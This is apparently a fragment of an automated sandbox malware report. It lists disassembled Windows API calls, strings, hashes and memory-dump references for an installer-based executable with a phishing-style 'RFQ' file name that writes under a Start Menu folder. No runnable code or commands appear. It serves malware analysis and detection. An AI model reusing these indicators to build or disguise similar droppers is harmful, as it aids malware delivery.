                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                      • Part of subcall function 004062AE: CharNextW.USER32(?,00000000,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                      • Part of subcall function 004062AE: CharPrevW.USER32(?,?,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                    • GetDiskFreeSpaceW.KERNEL32(004206B8,?,?,0000040F,?,004206B8,004206B8,?,00000001,004206B8,?,?,000003FB,?), ref: 004047C1
                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047DC
                                                                      • Part of subcall function 00404935: lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 004049D6
                                                                      • Part of subcall function 00404935: wsprintfW.USER32 ref: 004049DF
                                                                      • Part of subcall function 00404935: SetDlgItemTextW.USER32(?,004226E8), ref: 004049F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                    • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel$Call$&B
                                                                    • API String ID: 2624150263-2106666066
                                                                    • Opcode ID: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                    • Instruction ID: 0d30bce32a668ce4acefc1b856fca7f6450f1747cfb7256993ff8e50c76d0062
                                                                    • Opcode Fuzzy Hash: 8f775fb3ea646de8834d5ea4bf79a40c8e6bb2c6a0c6d8ae6640a0167b8418f2
                                                                    • Instruction Fuzzy Hash: 9BA170B1900218AFDB11AFA5DD85AAF77B8EF85314F10843BFA01B62D1D77C89418B6D
                                                                    APIs
                                                                      • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                    • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                                    • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                                    • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                                    • GlobalFree.KERNEL32(?), ref: 10001D83
                                                                    • GlobalFree.KERNEL32(?), ref: 10001D88
                                                                    • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                    • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                                    • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106959059885.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.106959018081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959096492.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106959124482.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$lstrcpy$Alloc
                                                                    • String ID:
                                                                    • API String ID: 4227406936-0
                                                                    • Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                    • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                                    • Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
                                                                    • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(004074E4,?,00000001,004074D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402114
                                                                    Strings
                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies, xrefs: 00402154
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: CreateInstance
                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\savoyed\antimodel\Intensifies
                                                                    • API String ID: 542301482-516762134
                                                                    • Opcode ID: 13dcccc13ea87bb0556e1c07569e348d8a88b33b8c7c11309abf84e89f0bf15d
                                                                    • Instruction ID: 3ca7e19c9ce8fc1ac7a66f6cc25710137151f8511148443d739b2fd9411afead
                                                                    • Opcode Fuzzy Hash: 13dcccc13ea87bb0556e1c07569e348d8a88b33b8c7c11309abf84e89f0bf15d
                                                                    • Instruction Fuzzy Hash: C6412D71A00204AFCF00DFA4CD88AAD7BB5FF48314B2045BAF515EB2D1DB799A41CB54
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID:
                                                                    • API String ID: 1974802433-0
                                                                    • Opcode ID: c32a85c171eab7676e44a2814eb8efa7c64b730574f9ff866e2b1adf1713f417
                                                                    • Instruction ID: 35ddb734ec7d865f8f709f830fd12decc1a753c42de70ab183506872ff8e9077
                                                                    • Opcode Fuzzy Hash: c32a85c171eab7676e44a2814eb8efa7c64b730574f9ff866e2b1adf1713f417
                                                                    • Instruction Fuzzy Hash: 0DF08271A00114DBC711EFA4DD49AAEB374FF44324F20457BF115F21E1D7B899409B29
                                                                    APIs
                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404319
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040432D
                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040434A
                                                                    • GetSysColor.USER32(?), ref: 0040435B
                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404369
                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404377
                                                                    • lstrlenW.KERNEL32(?), ref: 0040437C
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404389
                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040439E
                                                                    • GetDlgItem.USER32(?,0000040A), ref: 004043F7
                                                                    • SendMessageW.USER32(00000000), ref: 004043FE
                                                                    • GetDlgItem.USER32(?,000003E8), ref: 00404429
                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040446C
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 0040447A
                                                                    • SetCursor.USER32(00000000), ref: 0040447D
                                                                    • ShellExecuteW.SHELL32(0000070B,open,004271A0,00000000,00000000,00000001), ref: 00404492
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040449E
                                                                    • SetCursor.USER32(00000000), ref: 004044A1
                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 004044D0
                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 004044E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                    • String ID: Call$N$`7~v0}$open
                                                                    • API String ID: 3615053054-4099942157
                                                                    • Opcode ID: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                    • Instruction ID: 22110145f907261e11c2f5d787c062fb689e5c30422f2648b08f84481e86c76f
                                                                    • Opcode Fuzzy Hash: 0ecf00cceb9638254d38438ef4a41cc97479c5511747606477027e2e03a273fe
                                                                    • Instruction Fuzzy Hash: 567184B1900209BFDB109F60DD45B6A7B69FB94354F00843AFB01BA2D0C778AD51DFA9
                                                                    APIs
                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                    • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                    • String ID: F
                                                                    • API String ID: 941294808-1304234792
                                                                    • Opcode ID: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                    • Instruction ID: 0e42b5f20bdf07c2dc1b789da504779860c4ba9591388ef730275887389fb1b0
                                                                    • Opcode Fuzzy Hash: e8f64da504af091a1ac74c49f612a2602db3c4ea19621cede117ebbb55f272a6
                                                                    • Instruction Fuzzy Hash: 0C418A71804249AFCF058FA5DD459AFBBB9FF44310F00812AF961AA1A0C738EA51DFA5
                                                                    APIs
                                                                    • lstrcpyW.KERNEL32(00425D88,NUL), ref: 00405D58
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,?,00405EDC,?,?), ref: 00405D7C
                                                                    • GetShortPathNameW.KERNEL32(?,00425D88,00000400), ref: 00405D85
                                                                      • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B64
                                                                      • Part of subcall function 00405B54: lstrlenA.KERNEL32(00000000,?,00000000,00405E35,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B96
                                                                    • GetShortPathNameW.KERNEL32(00426588,00426588,00000400), ref: 00405DA2
                                                                    • wsprintfA.USER32 ref: 00405DC0
                                                                    • GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405DFB
                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E0A
                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E42
                                                                    • SetFilePointer.KERNEL32(00409558,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409558,00000000,[Rename],00000000,00000000,00000000), ref: 00405E98
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00405EA9
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EB0
                                                                      • Part of subcall function 00405BEF: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405BF3
                                                                      • Part of subcall function 00405BEF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403500,?), ref: 00405C15
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizewsprintf
                                                                    • String ID: %ls=%ls$NUL$[Rename]
                                                                    • API String ID: 222337774-899692902
                                                                    • Opcode ID: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                    • Instruction ID: 320379bf9b7b256e7873fa455d25e0b3442936e7d724c6c18c2d1b17e2228676
                                                                    • Opcode Fuzzy Hash: d0bebfde44d1b8ec79e846926d7a4151a37a86d35e5e56b98e3bdf1b29062508
                                                                    • Instruction Fuzzy Hash: CF31FF31A04B14BFD2216B659C49F6B3A5CDF41759F14043ABA41F62D3EA3CAA008ABD
                                                                    APIs
                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,00000000,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406311
                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 00406320
                                                                    • CharNextW.USER32(?,00000000,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406325
                                                                    • CharPrevW.USER32(?,?,75C43420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe",00403245,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00406338
                                                                    Strings
                                                                    • *?|<>/":, xrefs: 00406300
                                                                    • "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe", xrefs: 004062AE
                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 004062AF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Char$Next$Prev
                                                                    • String ID: "C:\Users\user\Desktop\RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                    • API String ID: 589700163-3930356100
                                                                    • Opcode ID: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                    • Instruction ID: 142112f625556876e4cd031ade27854873566ffa35591fc5fadb0a313d070af9
                                                                    • Opcode Fuzzy Hash: 8ee8cd0400997b91c539828d69c18a93901fceef673c05d99107dcd739bd8d52
                                                                    • Instruction Fuzzy Hash: 0711B616C0021299DB307B19DC40AB7A6E8EF99750B56803FED86732C1E77C5C9286BD
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00404162
                                                                    • GetSysColor.USER32(00000000), ref: 0040417E
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0040418A
                                                                    • SetBkMode.GDI32(?,?), ref: 00404196
                                                                    • GetSysColor.USER32(?), ref: 004041A9
                                                                    • SetBkColor.GDI32(?,?), ref: 004041B9
                                                                    • DeleteObject.GDI32(?), ref: 004041D3
                                                                    • CreateBrushIndirect.GDI32(?), ref: 004041DD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938943446.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_RFQ678903423_PROD_INQUIRY_SHANG_NOG_INDUSTRYs.jbxd
                                                                    Similarity
                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                    • String ID:
                                                                    • API String ID: 2320649405-0
                                                                    • Opcode ID: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                    • Instruction ID: 030d9aaba4ad3e93a8394b0be899aa32a9dffcfc2c3f2c4c75d4aa3950b62208
                                                                    • Opcode Fuzzy Hash: c06114881eeb7cb98e51f34ef0c94b9a5ec365808c16928caaa57928b34d57a9
                                                                    • Instruction Fuzzy Hash: CE21A4B5804704ABC7209F68DD48B4B7BF8AF41710F048A29F995E62E0C734E944CB55
                                                                    APIs
                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A5E
                                                                    • GetMessagePos.USER32 ref: 00404A66
                                                                    • ScreenToClient.USER32(?,?), ref: 00404A80
                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404A92
                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AB8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.106938484188.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.106938375986.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938587560.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.106938656716.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
